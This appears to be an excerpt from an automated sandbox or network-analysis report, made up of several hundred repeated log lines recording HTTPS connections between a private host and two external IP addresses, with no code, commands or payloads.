            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.53.203:443
            Source: global trafficTCP traffic: 104.21.53.203:443 -> 192.168.2.22:49163
